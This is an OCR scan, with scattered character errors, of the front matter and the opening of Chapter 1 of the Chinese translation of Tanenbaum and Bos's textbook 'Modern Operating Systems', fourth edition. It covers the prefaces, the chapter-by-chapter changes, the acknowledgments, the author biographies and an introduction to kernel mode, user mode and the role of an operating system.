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本 书 是 操作 系统 的 经 典 教 材 。 在 这 一 版 中 ，Tanenbaum 教 授 力 邀 来 自 谷歌 和 微软 的 技术 专家 摆 写 关于 
Android 和 Windows 8 的 新 章节 ， 此 外 ， 还 添加 了 云 、 虚 拟 化 和 安全 等 新 技术 的 介绍 。 书 中 处 处 融会 着 作者 
对 于 设计 与 实现 操作 系统 的 各 种 技术 的 思考 ， 他 们 的 深刻 洞察 与 清晰 闻 释 使 得 本 书 脱颖而出 且 经 久 不 衰 。 


第 4 版 重要 更 新 


。 新 增 一 章 讨论 虚拟 化 和 云 ， 新 增 一 节 讲 解 Android 操 作 系 统 ， 新 增 研究 实例 Windows 8。 此 外 ， 安 全 
方面 还 引入 了 攻击 和 防御 技术 的 新 知识 。 


e 习题 更 加 丰富 和 灵活 ， 这 些 题目 不 仅 能 考查 读者 对 基本 原理 的 理解 ， 能 力 ， 更 重要 的 是 启 
发 思考 ， 在 问题 中 挖掘 操作 系统 的 精髓 
。 每 章 的 相关 研究 一 节 全 部 重 写 ， 参 考 文献 收录 了 上 一 版 推出 后 的 233 篇 新 ， 这 些 对 于 在 该 领域 
进行 深入 探索 的 读者 而 言 非常 有 益 。 
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文艺 复兴 以 来 ,源远流长 的 科学 精神 和 逐步 形成 的 学 术 规 范 ， 使 西方 国家 在 自然 科学 的 各 个 领域 取得 
了 克 断 性 的 优势 ， 也 正 是 这 样 的 优势 ， 使 美国 在 信息 技术 发 展 的 六 十 多 年 间 名 家 辈出 、 独 领 风骚 。 在 商业 
化 的 进程 中 ， 美 国 的 产业 界 与 教育 界 越 来 越 紧密 地 结合 ， 计 算 机 学 科 中 的 许多 泰山 北斗 同时 身 处 科研 和 教 
学 的 最 前 线 ， 由 此 而 产生 的 经 典 科 学 著作 ， 不 仅 壁 划 了 研究 的 范畴 ， 还 揭示 了 学 术 的 源 变 ， 既 遵循 学 术 规 
范 ， 又 自 有 学 者 个 性 ， 其 价值 并 不 会 因 年 月 的 流逝 而 减退 。 

近年 ， 在 全 球 信息 化 大 潮 的 推动 下 ， 我 国 的 计算 机 产业 发 展 迅猛 ， 对 专业 人 才 的 需求 日 益 迫 切 。 这 对 
计算 机 教育 界 和 出 版 界 都 既是 机 遇 ， 也 是 挑战 ， 而 专业 教材 的 建设 在 教育 战略 上 显得 举足轻重 。 在 我 国信 
息 技术 发 展 时 间 较 短 的 现状 下 ， 美 国 等 发 达 国家 在 其 计算 机 科学 发 展 的 几 十 年 间 积淀 和 发 展 的 经 典 教材 仍 
有 许多 值得 借鉴 之 处 。 因 此 ， 引 进 一 批 国外 优秀 计算 机 教材 将 对 我 国 计 算 机 教育 事业 的 发 展 起 到 积极 的 推 
动作 用 ， 也 是 与 世界 接轨 、 建 设 真正 的 世界 一 流 大 学 的 必由之路 。 

机 械 工业 出 版 社 华章 公司 较 早 意识 到 “出 版 要 为 教育 服务 ”。 自 1998 年 开始 ， 我 们 就 将 工作 重点 放 
在 了 闭 选 、 移 译 国 外 优秀 教材 上 。 经 过 多 年 的 不 懈 努 力 ， 我 们 与 Pearson, McGraw-Hill, Elsevier, MIT, 
John Wiley & Sons, Cengage 等 世界 著名 出 版 公司 建立 了 良好 的 合作 关系 ， 从 他 们 现 有 的 数 百 种 教材 中 甄选 
出 Andrew S. Tanenbaum, Bjarne Stroustrup, Brian W. Kernighan, Dennis Ritchie, Jim Gray, Afred V. Aho, 
John E. Hopcroft, Jeffrey D. Ullman, Abraham Silberschatz, William Stallings, Donald E. Knuth, John L. 
Hennessy, Larry L.Peterson 等 大 师 名 家 的 一 批 经 典 作品 ， 以 “计算 机 科学 从 书 ”为 总 称 出 版 ， 供 读者 学 习 、 
研究 及 珍藏 。 大 理 石 纹理 的 封面 ， 也 正体 现 了 这 大 ,从 书 的 品位 和 格调 。 

“计算 机 科学 丛书 ”的 出 版 工作 得 到 了 国内 外 学 者 的 电力 相助 ， 国 内 的 专家 不 仅 提供 了 中 肯 的 选 题 指 
导 ， 还 不 辞 劳苦 地 担任 了 翻译 和 审 校 的 工作 ， 而 原 书 的 作者 也 相当 关注 其 作品 在 中 国 的 传播 ， 有 的 还 专门 
为 其 书 的 中 译本 作 序 。 记 今 ,“ 计 算 机 科学 丛书 ”已 经 出 版 了 近 两 百 个 品种 ， 这 些 书籍 在 读者 中 树立 了 良好 
的 口碑 ， 并 被 许多 高 校 采用 为 正式 教材 和 参考 书籍 。 其 影印 版 “经 典 原版 书库 ”作为 姊妹 篇 也 被 越 来 越 多 
实施 双语 教学 的 学 校 所 采用 。 

权威 的 作者 、 经 典 的 教材 、 一 流 的 译 者 、 严 格 的 审 校 、 精 细 的 编辑 ， 这 些 因素 使 我 们 的 图 书 有 了 质量 
的 保证 。 随 着 计算 机 科学 与 技术 专业 学 科 建 设 的 不 断 完善 和 教材 改革 的 逐渐 深化 ， 教 育 界 对 国外 计算 机 教 
材 的 需求 和 应 用 都 将 步 和 一 个 新 的 阶段 ， 我 们 的 目标 是 尽善尽美 ， 而 反馈 的 意见 正 是 我 们 达到 这 一 终极 目 
标的 重要 帮助 。 华 章 公司 欢迎 老师 和 读者 对 我 们 的 工作 提出 建议 或 给 予 指正 ， 我 们 的 联系 方法 如 下 : 


华章 网 站 : www.hzbook.com 

电子 邮件 : hzjsj@hzbook.com 

联系 电话 : (010) 88379604 

联系 地 址 ， 北京 市 西城 区 百 万 庄 南 街 ] 号 
邮政 编码 ，100037 华章 科技 图 书 出 版 中 心 
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Andrew S. Tanenbaum 教授 编写 的 教材 《现代 操作 系统 》 现 在 已 经 是 第 4 版 了 。 第 4 版 在 保持 原 有 特 
色 的 基础 上 ， 又 增添 了 许多 新 的 内 容 ， 反 映 了 当代 操作 系统 的 发 展 与 动向 ， 并 不 断 地 与 时 俱 进 。 

对 比 第 3 版 ， 第 4 版 有 很 多 变化 。 一 些 是 教材 中 多 处 可 见 的 细微 变化 ,一些 是 就 某 一 功能 或 机 制 增 
加 了 对 最 新 技术 的 介绍 ， 如 增加 了 futex 同步 原 语 、 读 一 复制 -更 新 (Read-Copy-Update ) 机 制 以 及 6 级 
RAID 的 内 容 。 另 外 一 些 则 是 重大 变化 ， 例 如 : 用 Windows 8 替换 了 Vista AA; 用 相当 大 的 篇 幅 介 绍 
了 移动 终端 应 用 最 广泛 、 发 展 最 快 的 Android， 以 替换 原来 Symbian 的 内 容 ; 增加 了 新 的 一 章 ， 介 绍 目前 
最 流行 的 虚拟 化 和 云 技术 , 其 中 还 包括 典型 案例 VMware。 很 多 章节 在 内 容 安排 上 也 有 较 大 的 改动 , 例如 : 
第 8 章 对 多 处 理 机 系统 的 内 容 进行 了 大 幅 更 新 ; 第 9 章 对 安全 的 内 容 进 行 了 大 量 修改 和 重新 组 织 ， 增 加 了 
对 缺陷 代码 、 恶 意 软 件 进 行 探 查 和 防御 的 新 内 容 ， 对 于 空 指针 引用 和 缓冲 区 溢出 等 攻击 行为 提出 了 更 详细 
的 应 对 方法 ， 并 从 攻击 路 径 人 入手， 详细 论述 了 包含 金 丝 雀 (canary ) 保护 、 不 执行 (NX ) 位 以 及 地 址 空 
间 随 机 化 在 内 的 防御 机 制 。 最 后 的 参考 文献 也 进行 了 更 新 ， 收 录 了 本 书 第 3 版 推出 后 发 表 的 新 论文 。 大 部 
分 章节 最 后 的 相关 研究 部 分 都 完全 重 写 了 ， 以 反映 最 新 的 操作 系统 研究 成 果 。 

本 教材 还 增添 了 一 名 合 著者 一 一 来 自 阿姆斯特丹 自由 大 学 的 Herbert Bos 教授 ， 他 是 一 名 全 方位 的 系 
统 专家 ， 尤 其 擅长 安全 和 UNIX 方面 。 

Tanenbaum 教 授 的 教材 还 有 一 个 特点 ,就 是 丰富 的 .引发 思考 的 习题 ,所 有 章节 后 面 都 附 有 大 量 的 习题 ， 
完成 这 些 习题 很 不 容易 ， 需 要 花费 很 长 时 间 ， 在 深入 理解 操作 系统 精髓 的 基础 上 才能 作答 。 这 些 习 题 很 灵 
活 ， 并 且 与 实际 系统 相 结合 ， 既 考核 对 基本 概念 、 工 作 原 理 的 理解 ， 又 考核 实际 动手 能 力 。 

Tanenbaum 教授 的 教材 是 需要 细 细 阅读 的 ， 字 里 行 间 体现 了 他 对 设计 与 实现 操作 系统 的 各 种 技术 的 
深入 思考 。 正 因为 Tanenbaum 教授 自己 设计 开发 了 一 个 小 型 、 真 实 的 操作 系统 MINIX， 所 以 通过 他 在 教 
材 中 的 讲述 ， 读 者 可 以 了 解 实现 操作 系统 时 应 该 考虑 哪些 问题 、 注 重 哪些 细节 。 

本 书 的 出 版 得 到 了 机 械 工业 出 版 社 华章 公司 副 总 经 理 温 莉 芳 女士 的 大 力 支持 ， 还 有 华章 公司 计算 机 
出 版 中 心 教材 部 副 主 任 朱 动 女士 以 及 其 他 各 位 编辑 的 支持 ， 在 此 表示 由 应 感 谢 。 

除 封面 署名 译 者 外 , 参加 本 书 翻 译 、 审 阅 和 校对 的 还 有 袁 鹏 飞 、 王 浩 宇 、 EK, ERA, BHR BROT 
申 鹏 、 诬 国 风 、 刘 静 、 肖 倾城 、 毛 文 东 、 叶 启 威 、 邵 雷 雷 、 梁 利 刚 、 崔 治 孙 、 间 丰润 、 李 小 奇 、 张 琳 、 刘 梦 韦 、 
粟 阶 、 刘 波 、 杨 海潮 、 杨 立 群 、 潘 伟 民 、 金 磷 、 周 晴 注 、 刘 满 、 梁 欣 、 刘 少 杰 、 任 慈 阳 、 陈 婧 野 、 盛 啸 然 、 
黄奕 博 、 温 泉 、 朱 晴晴 、 于 力 军 、 关 昆仑 、 刘 聪 、 李 赫 、 刘 严 鸿 等 。 此 外 ， 赵 霞 对 一 些 名 词 术 语 的 翻译 提 
出 了 宝贵 意见 。 

由 于 译 者 水 平 有 限 , 因此 译文 中 难免 会 存在 一 些 不 足 或 错误 之 处 , 欢迎 各 位 专家 和 广大 读者 批评 指正 。 


译 者 
2017 年 5 月 
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本 书 的 第 4 版 与 第 3 版 有 很 大 的 不 同 。 因 为 操作 系统 并 非 一 成 不 变 ， 所 以 书 中 随处 可 见 许多 为 介绍 新 
内 容 而 做 的 细小 改动 。 我 们 删除 了 有 关 多 媒体 操作 系统 的 章节 ， 主 要 是 为 了 给 新 内 容 腾 出 空间 ， 同 时 也 各 
免 此 书 的 篇 幅 变 得 不 可 控 。 还 删除 了 有 关 Windows Vista 的 章节 ， 这 是 因为 Vista 的 表现 并 没有 达到 微软 公 
司 的 预期 。 同 样 被 删除 的 还 有 Symbian 章节 ， 因 为 Symbian 已 不 再 被 广泛 使 用 。 我 们 用 Windows 8 替换 了 
Vista WAZ, FA Android 替换 了 Symbian 的 内 容 。 此 外 ， 我 们 还 增加 了 关于 虚拟 化 和 云 的 章节 。 以 下 是 有 
关 各 章节 更 改 的 概要 。 

第 1 章 的 很 多 地 方 都 进行 了 大 量 的 修改 和 更 新 ， 除 增加 了 移动 计算 外 ,没有 增加 或 删 减 主要 章节 。 

第 2 章 在 删除 一 些 过 时 内 容 的 同时 也 增加 了 一 些 新 内 容 。 例 如 ， 增 加 了 futex 同步 原 语 ， 还 增加 了 一 
节 介 绍 怎样 通过 读 — 复制 -更 新 (Read-Copy-Update ) 的 方式 来 避免 锁定 。 

第 3 章 更 关注 现代 的 硬件 部 件 ， 而 减少 了 对 段 和 MULTICS 的 介绍 。 

第 4 章 删除 了 有 关 CD-ROM 的 内 容 ， 因 为 它们 已 不 常见 。 蔡 代 它 们 的 是 更 加 现代 的 解决 方案 ( 比如 
闪存 盘 ) 。 不 仅 如 此 ， 我 们 还 在 讨论 RAID 时 添加 了 6 级 RAID WAZA. 

第 $ 章 的 内 容 做 了 很 多 改动 ，CRT 和 CD-ROM 等 过 时 设备 的 介绍 被 删 掉 了 ， 同 时 加 入 了 触摸 屏 等 新 
技术 。 

第 6 章 的 内 容 基本 没有 改变 ， 有 关 死 锁 的 主题 基本 上 是 稳定 的 ， 并 没有 新 的 成 果 。 

第 7 章 是 全 新 的 ， 涵 盖 虚拟 化 和 云 等 重要 内 容 ， 并 加 入 了 一 节 有 关 VMware 的 内 容 作为 案例 。 

第 8 章 是 对 之 前 讨论 的 多 处 理 机 系统 的 更 新 。 如 今 我 们 更 加 强调 多 核 与 众 核 系统 ， 因 为 它们 在 过 去 的 
几 年 中 变 得 愈 发 重要 。 高 速 缓存 一 致 性 近年 来 也 已 经 成 为 一 个 重要 问题 ， 这 里 将 会 有 所 涉及 。 

第 9 章 进行 了 大 量 修 改 和 重新 组 织 ， 增 加 了 对 缺陷 代码 、 恶 意 软件 进行 探查 和 防御 的 新 内 容 。 对 于 空 
指针 引用 和 缓冲 区 溢出 等 攻击 行为 提出 了 更 详细 的 应 对 方法 ， 并 从 攻击 路 径 人 手 ， 详 细 论 述 了 包含 金 丝 雀 
(canary ) 保护 、 不 执行 (NX ) 位 以 及 地 址 空间 随机 化 在 内 的 防御 机 制 。 

第 10 章 有 很 大 改变 ， 除了 对 UNIX 和 Linux 的 内 容 进 行 更 新 外 ， 还 新 增 了 有 关 Android 操作 系统 的 详 
细 章 节 ， 该 系统 如 今 已 广泛 用 于 智能 手机 与 平板 电脑 。 

第 11 章 在 本 书 第 3 版 中 主要 针对 Windows Vista， 然 而 这 些 内 容 已 经 被 Windows 8 尤其 是 Windows 8.1 
取代 ， 本 章 介绍 了 有 关 Windows 的 最 新 内 容 。 

第 12 章 是 对 本 书 前 一 版 本 的 第 13 章 的 修订 。 

第 13 章 是 一 份 全 新 的 推荐 阅读 目录 。 此 外 ， 我 们 也 对 参考 文献 进行 了 更 新 ， 收 录 了 本 书 第 3 版 推出 
后 发 表 的 233 篇 新 论文 。 

此 外 ,每 章 末 的 相关 研究 部 分 完全 重 写 了 ， 以 反映 最 新 的 操作 系统 研究 成 果 。 并 且 ， 所 有 章节 都 增加 
了 新 的 习题 。 

本 书 提供 了 大 量 的 教学 辅助 工具 。 针 对 教师 的 教学 建议 可 以 在 如 下 网 站 上 得 到 : www. 
pearsonhighered.com/tanenbaum。 网 站 中 包含 幻灯 片 、 学 习 操 作 系 统 的 软件 工具 、 学 生 实 验 、 模 拟 程 序 以 及 
许多 有 关 操 作 系统 课程 的 材料 。 

有 很 多 人 参与 了 本 书 第 4 版 的 编写 工作 。 我 要 介绍 的 第 一 位 同时 也 是 最 重要 的 一 位 ， 是 来 自 阿 姆 斯 特 
丹 自 由 大 学 的 Herbert Bos 教授 ， 他 是 本 书 的 合 著者 。 他 是 一 名 全 方位 的 系统 专家 ， 尤 其 是 在 安全 和 UNIX 
方面 ， 有 他 的 帮助 真是 太 好 了 。 他 编写 了 除 以 下 所 述 内 容 之 外 的 绝 大 部 分 新 内 容 。 


O ”关于 本 书 教 辅 资源 ， 只 有 使 用 本 书 作为 教材 的 教师 才 可 以 申请 ， 需 要 的 教师 可 向 机 械 工 业 出 版 社 华章 公司 申 
请 ， 电 话 : 010-88379061， 电 子 邮件 : hzzz@hzbook.com。 一 一 编辑 注 
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我 们 的 编辑 Tracy Johnson 出 色 地 完成 了 她 的 工作 ， 像 以 往 一 样 ， 她 将 所 有 零碎 的 东西 整理 在 一 起 ， 解 
决 了 所 有 的 麻烦 ， 使 得 这 项 工作 能 够 按时 完成 。 我 们 同样 为 拥有 一 位 长 期 合作 的 制作 编辑 而 感到 幸运 ， 那 
就 是 Camille Trentacoste。 多 亏 她 在 诸多 方面 的 技巧 ， 为 我 们 节省 了 很 多 时 间 。 我 们 很 高 兴 在 许多 年 之 后 又 
能 有 她 的 加 入 。Carole Snyder 在 本 书 编写 过 程 中 出 色 地 完成 了 协调 工作 。 

第 7 章 中 有 关 VMware 的 内 容 (7.12 节 ) 是 由 Edouard Bugnion 完成 的 ， 他 来 自 洛桑 联邦 理工 学 院 

(EPFL) 。Edouard 是 VMware 公司 的 创始 人 之 一 ， 他 比 其 他 人 更 了 解 VMware， 我 们 感谢 他 所 提供 的 

巨大 支持 。 

佐治 亚 理工 学 院 的 Ada Gavrilovska 是 Linux 内 核 专 家 ， 她 帮忙 更 新 了 第 10 章 的 内 容 。 第 10 章 中 有 
Æ Android 的 内 容 是 由 来 自 Google 的 Android 系统 核心 工程 师 Dianne Hackborn 编写 的 。Android 现在 是 智 
能 手机 的 主要 操作 系统 ， 所 以 我 们 非常 感谢 Dianne 所 提供 的 帮助 。 如 今 第 10 章 篇 幅 较 长 并 且 十 分 详细 ， 
UNIX, Linux 和 Android 的 粉丝 们 都 能 从 中 学 到 很 多 。 值 得 一 提 的 是 ， 本 书 中 最 长 并 且 最 有 技术 含量 的 章 
节 是 由 两 位 女士 所 写 的 ， 而 我 们 只 是 完成 了 其 余 容易 的 工作 。 

然而 ， 我 们 并 没有 忽略 Windows. Microsoft 的 Dave Probert 更 新 了 上 版 中 第 11 章 的 内 容 ， 这 一 版 将 
详细 讲解 Windows 8.1。Dave 拥有 完备 的 Windows 知识 及 足够 的 远见 ， 可 以 辨别 出 微软 正确 的 地 方 和 错误 
的 地 方 。Windows 的 粉丝 们 肯定 会 喜欢 这 一 章 。 | 

这 本 书 由 于 所 有 这 些 专家 所 做 出 的 贡献 而 变 得 更 好 ， 所 以 再 一 次 感谢 他 们 的 宝贵 帮助 。 

同样 令 我 们 感到 幸运 的 是 ， 我 们 拥有 那么 多 阅读 过 原稿 并 提出 建议 的 评论 者 ， 他 们 是 Trudy 
Levine, Shivakant Mishra, Krishna Sivalingam 以 及 Ken Wong. Steve Armstrong 为 将 本 书 作为 教材 的 教 
师 制作 了 PPT. 

通常 来 说 ， 文字 编辑 和 校对 员 并 不 具备 充足 的 操作 系统 专业 知识 ， 但 是 Bob Lentz ( 文字 编辑 ) 和 Joe 
Ruddick ( 校对 员 ) 却 非常 专业 。Joe 有 一 个 很 特别 的 本 事 ， 他 能 从 20 米 之 外 看 出 罗马 字体 与 斜体 的 差别 。 
尽管 如 此 ,我 们 这 些 作者 将 对 书 中 所 有 残留 的 错误 负责 ,读者 若 看 到 任何 错误 都 可 以 联系 作者 中 的 任何 一 位 。 

放 在 最 后 但 并 非 是 最 不 重要 的 ，Barbara 和 Marvin 还 是 那么 出 众 ， 一 如 既往 地 独一无二 。Daniel 和 
Matilde 是 我 们 家 庭 中 伟大 的 新 成 员 。Aron 和 Nathan 是 很 有 意思 的 小 家 伙 , Olivia 对 我 们 来 说 是 珍宝 。 当 然 了 ， 
我 要 感谢 Suzanne 一 直 以 来 的 爱 和 耐心 , 感谢 你 带 来 的 那些 sinaasappelsap( 荷兰 语 , 橙汁 ) druiven ( 荷兰 语 ， 
葡萄 ) 和 kersen ( 荷兰 语 ， 樱 桃 ) ， 以 及 所 有 的 新 鲜果 蔬 。 (AST) 

最 重要 的 一 点 ， 我 要 感谢 Marieke, Duko 和 Jip。 感 谢 Marieke 一 直 以 来 的 关爱 ， 还 有 忍受 我 为 了 此 
书 而 没 日 没 夜 地 工作 。 感 谢 Duko 和 Jip 将 我 从 工作 中 搜 出 来 ， 并 让 我 知道 生活 中 还 有 更 重要 的 事情 ， 比 如 

《Minecraft》。 (HB ) 
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Andrew S. Tanenbaum 拥有 麻 省 理工 学 院 的 理学 学 士 学 位 和 加 州 大 学 伯克利 分 校 的 博士 学 位 ， 如 今 他 
是 阿姆斯特丹 自由 大 学 计算 机 科学 学 院 的 教授 。 他 曾经 是 计算 与 图 像 高 级 学 院 的 院 长 ， 这 是 一 个 跨 大 学 的 
研究 生 院 ， 主 要 研究 高 级 并 行 、 分 布 式 以 及 图 像 系 统 。 他 同时 也 是 荷兰 皇家 艺术 与 科学 院 的 教授 ， 这 使 得 
他 没有 变 成 一 个 刻板 的 人 。 他 还 赢得 过 享有 盛名 的 欧洲 研究 理事 会 卓越 贡献 奖 。 

过 去 一 段 时 间 ， 他 的 主要 研究 方向 是 编译 器 、 操 作 系 统 、 网 络 以 及 分 布 式 系统 。 现 在 他 的 主要 研究 
方向 是 安全 可 靠 的 操作 系统 。 他 在 这 个 研究 方向 已 经 发 表 了 超过 175 篇 经 常 被 引用 的 期 刊 和 会 议论 文 。 
Tanenbaum 教授 还 撰写 或 参与 撰写 了 5 本 教材 ， 并 被 翻译 成 20 种 语言 ， 其 中 包括 巴 斯 克 语 和 泰语 。 这 些 教 
材 被 全 球 的 大 学 使 用 ， 总 计 有 163 个 版 本 (语言 和 版 本 加 起 来 ) 。 

Tanenbaum 教授 还 编写 了 大 量 的 软件 ， 特 别 是 MINIX， 这 是 一 个 小 型 的 UNIX。 其 灵感 直接 源 于 
Linux 以 及 Linux 最 初 开发 的 平台 。 如 今 的 MINIX 版 本 是 MINIX 3， 专 注 于 成 为 一 个 非常 可 靠 和 安全 的 操 
作 系 统 。 只 有 当 任 何 用 户 都 不 会 遭遇 操作 系统 崩溃 的 情况 时 ，Tanenbaum 教授 才 认 为 他 完成 了 自己 的 工作 。 
MINIX 3 是 一 个 欢迎 所 有 人 来 完善 的 开放 源 代码 项 目 ， 请 访问 www.minix3.org 下 载 MINIX 3 的 免费 版 本 ， 
并 试 着 运行 它 。x86 和 ARM 版 本 都 可 用 。 

Tanenbaum 教授 的 博士 生 在 毕业 后 都 有 很 好 的 前 途 ， 对 于 这 一 点 教授 本 人 非常 自豪 。 在 这 方面 ， 他 如 
同一 只 爱 孩 子 的 母 鸡 。 

Tanenbaum 教授 是 ACM 会 士 、IEEE 会 士 ， 也 是 荷兰 皇家 艺术 与 科学 院 院士 。 他 荣获 了 相当 多 的 
ACM, IEEE 和 USENIX 奖项 。 如 果 你 对 此 感到 好 奇 ， 可 以 去 他 的 Wikipedia 主页 查看 。 他 还 有 两 个 荣誉 博 


士 学 位 。 


Herbert Bos 在 特 温 特大 学 获得 硕士 学 位 ， 在 剑桥 大 学 计算 机 实验 室 获 得 博士 学 位 。 此 后 ， 他 为 Linux 
等 操作 系统 的 可 信 IO 架构 做 了 大 量 工作 ， 同 时 也 基于 MINIX 3 研究 系统 。 他 现在 是 阿姆斯特丹 自由 大 学 
计算 机 科学 学 院 系 统 与 网 络 安全 系 的 教授 ， 主 要 研究 方向 是 系统 安全 。 他 与 学 生 一 起 以 新 颖 的 方式 检测 并 
阻止 攻击 ， 分 析 并 对 恶意 软件 进行 反 向 工程 ， 还 共同 拆 印 过 僵尸 网 络 ( 横 跨 几 百 万 台 计 算 机 的 恶意 网 络 基 
础 设施 ) 。2011 年 ， 他 因 在 反 向 工程 领域 的 研究 获得 了 ERC 奖 。 他 的 三 个 学 生 因 所 写 的 与 系统 相关 的 论文 
被 评 为 欧洲 最 佳 博士 论文 而 获得 了 Roger Needham 奖 。 
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第 ] 章 


Modern Operating Systems, Fourth Edition 


引 论 








现代 计算 机 系统 由 一 个 或 多 个 处 理 器 、 主 存 、 磁 盘 、 打 印 机 、 键 盘 、 鼠 标 、 显 示 器 、 网 络 接口 以 及 
各 种 其 他 输入 /输出 设备 组 成 。 一 般 而 言 ， 现 代 计 算 机 系统 是 一 个 复杂 的 系统 。 如 果 每 位 应 用 程序 员 都 
不 得 不 掌握 系统 的 所 有 细节 ， 那 就 不 可 能 再 编写 代码 了 。 而 且 ， 管 理 这 些 部 件 并 加 以 优化 使 用 ， 是 一 件 
挑战 性 极 强 的 工作 。 所 以 ， 计 算 机 安装 了 一 层 软件 ， 称 为 操作 系统 ， 它 的 任务 是 为 用 户 程序 提供 一 个 更 
好 、 更 简单 、 更 清晰 的 计算 机 模型 ， 并 管理 刚才 提 到 的 所 有 设备 。 本 书 的 主题 就 是 操作 系统 。 

多 数 读 者 都 会 对 诸如 Windows、Linux、FreeBSD 或 OS X 等 某 个 操作 系统 有 些 体验 ， 但 表面 现象 是 
会 骗 人 的 。 用 户 与 之 交互 的 程序 ， 基 于 文本 的 通常 称 为 shell ， 而 基于 图 标的 则 称 为 图 形 用 户 界 面 
(Graphical User Interface，GUI) ， 它 们 实际 上 并 不 是 操作 系统 的 一 部 分 ， 尽 管 这 些 程序 使 用 操作 系统 来 
完成 工作 。 

图 1-1 给 出 了 这 里 所 讨论 的 主要 部 件 的 一 个 简化 视图 。 图 的 底部 是 硬件 。 硬 件 包 括 芯片 、 电 路 板 、 
磁盘 、 键 盘 、 显 示 器 以 及 类 似 的 设备 。 在 硬件 的 顶部 是 软件 。 多 数 计算 机 有 两 种 运行 模式 : 内 核 态 和 用 
户 态 。 软 件 中 最 基础 的 部 分 是 操作 系统 ， 它 运行 在 内 核 态 (也 称 为 管 态 、 核 心态 ) 。 在 这 个 模式 中 ， 操 
作 系 统 具 有 对 所 有 硬件 的 完全 访问 权 ， 可 以 执行 机 器 能 够 运行 的 任何 指令 。 软 件 的 其 余部 分 运行 在 用 户 
态 下 。 在 用 户 态 下 ， 只 使 用 了 机 器 指令 中 的 一 个 子 集 。 特 别 地 ， 那 些 会 影响 机 器 的 控制 或 可 进行 1O 
(输入 /输出 ) 操作 的 指令 ， 在 用 户 态 中 的 程序 里 是 禁止 的 。 在 本 书 中 ， 我 们 会 不 断 地 讨论 内 核 态 和 用 户 
态 之 间 的 差别 ， 这 些 差别 在 操作 系统 的 运作 中 扮 
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这 些 程序 也 大 量 使 用 操作 系统 。 
操作 系统 所 在 的 位 置 如 图 1-1 所 示 。 它 运行 在 
裸 机 之 上 ， 为 所 有 其 他 软件 提供 基础 的 运行 环境 。 
操作 系统 和 普通 软件 (用户 态 ) 之 间 的 主要 
区 别 是 ， 如 果 用 户 不 喜欢 某 个 特定 的 电子 邮件 阅 
读 器 ， 他 可 以 自由 选择 另 一 个 ， 或 者 自己 写 一 个 ， 


用 户 接口 程序 | > 软件 








硬件 


但 是 不 能 自行 写 一 个 属于 操作 系统 一 部 分 的 时 钟 图 1-1 操作 系统 所 处 的 位 置 
中 断 处 理 程序 。 这 个 程序 由 硬件 保护 ， 防 止 用 户 
试图 对 其 进行 修改 。 


然而 ， 有 时 在 嵌入 式 系统 (该 系统 没有 内 核 态 ) 或 解释 系统 (如 基于 Java 的 操作 系统 ， 它 采用 解释 
方式 而 非 硬件 方式 区 分 组 件 ) 中 ， 上 述 区 别 是 模糊 的 。 

另外 ， 在 许多 系统 中 ， 一 些 在 用 户 态 下 运行 的 程序 协助 操作 系统 完成 特权 功能 。 例 如 ， 经 常 有 一 个 
程序 供用 户 修改 其 口令 之 用 。 但 是 这 个 程序 不 是 操作 系统 的 一 部 分 ， 也 不 在 内 核 态 下 运行 ， 不 过 它 明显 
地 带 有 敏感 的 功能 ， 并 且 必 须 以 某 种 方式 给 予 保护 。 在 某 些 系统 中 ， 这 种 想法 被 推 向 了 极致 ， 一 些 传统 
上 被 认为 是 操作 系统 的 部 分 (诸如 文件 系统 ) 在 用 户 空间 中 运行 。 在 这 类 系统 中 ， 很 难 划 分 出 一 条 明显 
的 界限 。 在 内 核 态 中 运行 的 当然 是 操作 系统 的 一 部 分 ， 但 是 一 些 在 内 核 外 运行 的 程序 也 有 争议 地 被 认为 
是 操作 系统 的 一 部 分 ， 或 者 至 少 与 操作 系统 密切 相关 。 

操作 系统 与 用 户 ( 即 应 用 ) 程序 的 差异 并 不 仅仅 在 于 它们 所 处 的 地 位 。 特 别 地 ， 操 作 系统 更 加 大 型 、 
复杂 和 长 寿 。Linux 或 Windows 操 作 系统 的 源 代 码 有 500 万 行 甚至 更 高 的 数量 级 。 要 理解 这 个 数量 的 含义 ， 
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请 考虑 具有 500 万 行 的 一 套 书 ， 每 页 50 行 ， 每 卷 1000 页 ( 比 本 书 厚 ) 。 为 了 以 书 的 大 小 列 出 一 个 操作 系统 ， 
需要 有 100 卷 书 一 一 基本 上 需要 一 整个 书架 来 摆 放 。 请 设想 一 下 有 个 维护 操作 系统 的 工作 ， 第 一 天 老板 
带 你 到 装 有 代码 的 书架 旁 ， 说 :“ 去 读 吧 。” 而 这 仅仅 是 运行 在 内 核 中 的 部 分 代码 。 当 包括 重要 的 共享 库 
时 ，Windows 将 有 超过 7000 万 行 代码 ， 或 者 说 要 用 10~20 个 书架 ， 而 且 这 还 不 包括 一 些 基础 的 应 用 (如 
Windows Explorer, Windows Media Player 等 ) 。 

至 于 为 什么 操作 系统 的 寿命 较 长 , 读者 现在 应 该 清楚 了 一 一 操作 系统 是 很 难 编写 的 。 一旦 编写 完成 ， 
操作 系统 的 所 有 者 当然 不 愿意 把 它 扔 掉 ， 再 写 一 人 个。 相反， 操作 系统 会 在 长 时 间 内 进行 演化 。 基 本 上 可 
以 把 Windows 95/98/Me 看 成 是 一 个 操作 系统 ， 而 Windows NT/2000/XP/Vista/Windows 7 则 是 另外 一 个 操 
作 系统 。 对 于 用 户 而 言 ， 它 们 看 上 去 很 像 ， 因 为 微软 公司 努力 使 Windows 2000/XP/Vista/Windows 7 与 被 
替代 系统 (如 Windows 98) 的 用 户 界面 看 起 来 十 分 相似 。 无 论 如 何 ， 微 软 公司 要 舍弃 Windows 98 是 有 
非常 正当 的 原因 的 ， 我 们 将 在 第 11 章 涉及 Windows 细 节 时 具体 讨论 这 一 内 容 。 

除了 Windows 以 外 ， 贯 穿 本 书 的 其 他 主要 例子 还 有 UNIX， 以 及 它 的 变 体 和 克隆 版 。UNIX 当 然 也 演 
化 了 多 年 ， 如 System V 版 、Solaris 以 及 FreeBSD 等 都 是 来 源 于 UNIX 的 原始 版 ， 不 过 尽管 Linux 非 常 像 依 
照 UNIX 模 式 仿制 而 成 ， 并 且 与 UNIX 高 度 兼 容 ， 但 是 Linux 具 有 全 新 的 代码 基础 。 本 书 将 采用 来 自 UNIX 
中 的 示例 ， 并 在 第 10 章 中 具体 讨论 Linux。 

本 章 将 简要 叙述 操作 系统 的 若干 重要 部 分 ， 内容 包括 其 含义 、 历 史 、 分 类 、 一 些 基 本 概念 及 其 结构 。 
在 后 面 的 章节 中 ， 我 们 将 具体 讨论 这 些 重要 内 容 。 


1.1 什么 是 操作 系统 

